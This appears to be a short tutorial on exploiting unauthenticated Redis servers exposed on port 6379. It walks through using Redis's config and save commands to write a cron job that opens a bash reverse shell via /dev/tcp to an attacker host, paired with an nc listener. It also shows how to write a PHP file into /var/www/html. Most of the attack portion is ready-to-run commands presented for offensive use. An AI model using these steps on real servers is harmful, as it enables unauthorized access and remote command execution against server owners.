1. Vulnerability Introduction#
By default, Redis is bound to 0.0.0.0:6379. If no relevant strategies are adopted, such as adding firewall rules to prevent access from non-trusted sources, Redis service will be exposed to the public network. If password authentication is not set (usually empty), it will allow unauthorized access to Redis and reading of Redis data by any user who can access the target server.
Attackers can exploit the unauthorized access vulnerability by using Redis's own config command to log in to the target server, add scheduled tasks, write web shells, and perform other operations.
The following operations are performed under the premise of an existing Redis unauthorized access vulnerability.
2. Exploiting Scheduled Tasks to Reverse Shell#
https://github.com/caoxinyu/RedisClient/releases
https://github.com/dmajkic/redis/downloads
Run the following command on the compromised host connected to the vulnerability:
set xx "\n* * * * * bash -i >& /dev/tcp/IP Address/Port 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
Run the following command locally:
nc -lvnp Port
3. Writing Web Shell in Redis#
config set dir /var/www/html
config set dbfilename test123.php
set webshell "<?php phpinfo(); ?>"
save